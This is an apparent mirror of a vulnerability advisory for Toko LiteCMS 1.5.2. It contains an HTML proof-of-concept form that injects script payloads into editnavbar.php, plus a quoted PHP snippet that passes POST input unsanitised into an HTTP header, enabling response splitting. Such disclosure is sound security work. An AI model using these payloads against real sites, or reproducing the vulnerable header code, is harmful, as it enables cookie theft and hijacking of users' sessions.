46 lines
No EOL
1.8 KiB
Text
46 lines
No EOL
1.8 KiB
Text
source: https://www.securityfocus.com/bid/49673/info
|
|
|
|
Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
|
|
|
|
Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected.
|
|
|
|
Cross Site Scripting Vulnerabilities
|
|
|
|
<html>
|
|
<title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title>
|
|
<body bgcolor="#1C1C1C">
|
|
<script type="text/javascript">
|
|
function xss(){document.forms["xss"].submit();}
|
|
</script>
|
|
<br /><br />
|
|
<form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
|
|
<input type="hidden" name="currPath" value='"><script>alert(1)</script>' />
|
|
<input type="hidden" name="path" value='"><script>alert(2)</script>' />
|
|
</form>
|
|
<a href="javascript: xss();" style="text-decoration:none">
|
|
<b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br />
|
|
</body></html>
|
|
|
|
|
|
HTTP Response Splitting
|
|
|
|
====================================================================
|
|
/edit.php:
|
|
--------------------------------------------------------------------
|
|
|
|
3: $charSet = "iso-8859-1";
|
|
4: $dir = "ltr";
|
|
5:
|
|
6: if ( isset( $_POST[ "charSet" ] ) )
|
|
7: {
|
|
8: $charSet = $_POST[ "charSet" ];
|
|
9:
|
|
10: if ( $charSet == "windows-1255" )
|
|
11: {
|
|
12: $dir = "rtl";
|
|
13: }
|
|
14: }
|
|
15:
|
|
16: header( "Content-Type: text/html; charset=" . $charSet ); |